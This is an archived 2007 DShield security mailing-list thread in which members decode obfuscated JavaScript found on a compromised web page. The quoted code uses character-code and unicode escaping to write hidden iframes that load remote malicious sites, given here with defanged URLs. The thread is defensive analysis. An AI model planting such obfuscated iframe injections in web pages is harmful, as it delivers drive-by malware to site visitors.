[Dshield] Need help decoding hackers javascript code

Dave Hatz davehatz at hatzventures.org
Wed Sep 5 00:41:48 GMT 2007


For those of us out here who are not as security savvy as some of the
experts on this list, what is the hacker trying to accomplish with this
page?

Dave Hatz 

-----Original Message-----
From: list-bounces at lists.dshield.org [mailto:list-bounces at lists.dshield.org]
On Behalf Of Chris Wright
Sent: Tuesday, September 04, 2007 1:24 PM
To: 'General DShield Discussion List'
Subject: Re: [Dshield] Need help decoding hackers javascript code


And just to save everyone else from having to decode it:

First block is:

<iframe width=1 height=1 border=0 frameborder=0
src='hXXp://bensax.info/index2.html'></iframe> 

> 
> <meta name="robots" content="all" /><SCRIPT LANGUAGE="JavaScript">
> <!--
> function Decode(){var temp="",i,c=0,out="";var
> str="60!105!102!114!97!109!101!32!119!105!100!116!104!61!49!32
> !104!101!105!103!104!116!61!49!32!98!111!114!100!101!114!61!48
> !32!102!114!97!109!101!98!111!114!100!101!114!61!48!32!115!114
> !99!61!39!104!116!116!112!58!47!47!98!101!110!115!97!120!46!10
> 5!110!102!111!47!105!110!100!101!120!50!46!104!116!109!108!39!
> 62!60!47!105!102!114!97!109!101!62!13!10!";l=str.length;while(
c<=str.length-1){while(str.charAt(c)!='!')>
temp=temp+str.charAt(c++);c++;out=out+String.fromCharCode(temp
> );temp="";}document.write(out);}

Second block is:

<iframe src="hXXp://zlo-x.net/XDS/iframe.php" width=0 height=0
border=0></iframe>


> </SCRIPT>
> <meta name="revisit-after" content="1 days" /><script
> type="text/javascript">document.write('\u003c\u0069\u0066\u007
> 2\u0061\u006d\u0065\u0020\u0073\u0072\u0063\u003d\u0022\u0068\
> u0074\u0074\u0070\u003a\u002f\u002f\u007a\u006c\u006f\u002d\u0
> 078\u002e\u006e\u0065\u0074\u002f\u0058\u0044\u0053\u002f\u006
> 9\u0066\u0072\u0061\u006d\u0065\u002e\u0070\u0068\u0070\u0022\
> u0020\u0077\u0069\u0064\u0074\u0068\u003d\u0030\u0020\u0068\u0
> 065\u0069\u0067\u0068\u0074\u003d\u0030\u0020\u0062\u006f\u007
> 2\u0064\u0065\u0072\u003d\u0030\u003e\u003c\u002f\u0069\u0066\
> u0072\u0061\u006d\u0065\u003e')</script>
> 

_________________________________________
SANSFIRE 2007 July 25-August 2 in Washington, DC.  56 courses, SANS top
instructors, and a great tools and solutions expo. Register today!
http://www.sans.org/info/4651 (brochure code ISC)



More information about the list mailing list